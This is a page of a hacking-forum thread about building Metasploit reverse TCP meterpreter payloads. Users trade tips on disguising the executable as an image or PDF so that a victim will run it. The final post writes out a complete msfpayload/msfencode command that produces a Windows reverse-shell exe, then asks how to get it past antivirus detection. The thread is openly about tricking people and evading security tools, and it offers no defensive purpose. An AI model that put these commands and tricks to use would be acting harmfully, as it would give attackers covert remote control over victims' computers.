Page 7 of 9 FirstFirst ... 56789 LastLast

Thread: Metasploiting for BT3 - Reverse TCP

yes A and B are in different subnet and A can't ping directly B (but A can ping the ISP of B and vise versa)

Quote Originally Posted by samer View Post
    yes A and B are in different subnet and A can't ping directly B (but A can ping the ISP of B and vise versa)
    Would have been easier to say that from the start, instead of "they're on the same network but they're not on the same network". If that's the case, and they can ping the WAN addresses, then just use them instead of the LAN addresses.

~phoenix910

Just burned his ISO

Excellent work,

I have a question. Is it possible to create output.exe with a different format like "output.jpeg" or "output.gif" ? Because it will be easier to convince the person to run it...

Thanks

good question il give that a try.
    as soon as i can find some "BLOODY CIGARETTES""
    I would rather be hated for what i am,
    Then loved for what i am not.

Quote Originally Posted by cody81 View Post
    Excellent work,

I have a question. Is it possible to create output.exe with a different format like "output.jpeg" or "output.gif" ? Because it will be easier to convince the person to run it...

Thanks
    Not that I know of - they aren't executables. Mind you, I haven't tried it. I'd just try binding the exe with the picture if that's what you want to achieve.

~phoenix910

na didnt work
    I would rather be hated for what i am,
    Then loved for what i am not.

Just burned his ISO

Quote Originally Posted by phoenix910 View Post
    Not that I know of - they aren't executables. Mind you, I haven't tried it. I'd just try binding the exe with the picture if that's what you want to achieve.

~phoenix910
    Thanks for your response... However, that's not what i want to achieve exactly.

In a video(I am not allowed to post the URL of the video because of my post count. If you want i can send pm to you), he is doing the same think with a ".pdf" file to start up the multihandler to catch the callback. That's why i asked about jpeg. I also checked his website that's given in the video but i didn't understand exactly. By the way, do you know about creating it in pdf format?

Quote Originally Posted by cody81 View Post
    Thanks for your response... However, that's not what i want to achieve exactly.

In a video(I am not allowed to post the URL of the video because of my post count. If you want i can send pm to you), he is doing the same think with a ".pdf" file to start up the multihandler to catch the callback. That's why i asked about jpeg. I also checked his website that's given in the video but i didn't understand exactly. By the way, do you know about creating it in pdf format?
    is it this one:
    http://www.ethicalhacker.net/content/view/219/24/

Never done it myself, but I assume that this is exploiting a PDF's ability to interpret scripting? Haven't looked at any links yet myself, but that's just off the top of my head.

~phoenix910

Default exe file is caught by Avast

Well, seems that the AV is getting smarter.
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

The above exe can no longer be used because of the AV warning. Any idea to overcome this?
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

Page 7 of 9 FirstFirst ... 56789 LastLast